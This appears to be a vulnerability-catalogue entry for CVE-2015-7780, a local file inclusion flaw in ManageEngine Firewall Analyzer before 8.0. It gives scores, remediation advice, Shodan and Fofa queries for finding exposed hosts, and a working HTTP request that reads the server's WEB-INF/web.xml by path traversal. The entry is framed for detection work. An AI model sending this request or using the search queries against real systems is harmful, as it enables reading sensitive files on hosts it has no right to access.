🔙 목록으로 돌아가기

CVE-2015-7780: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion

TitleManageEngine Firewall Analyzer <8.0 - Local File Inclusion
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system, potentially leading to unauthorized access or information disclosure.
RemediationUpgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability.
CVSS Score6.5
EPSS Score0.36216
CVE IDCVE-2015-7780
CWE IDCWE-22
Shodan Queryhttp.title:"opmanager plus"
Fofa Querytitle="opmanager plus"
Tags cve2015 cve manageengine edb lfi zohocorp vuln

🔍 Vulnerability Description

ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.

🌐 HTTP Request

GET /fw/mindex.do?url=./WEB-INF/web.xml%3f HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-7780.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-7780.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A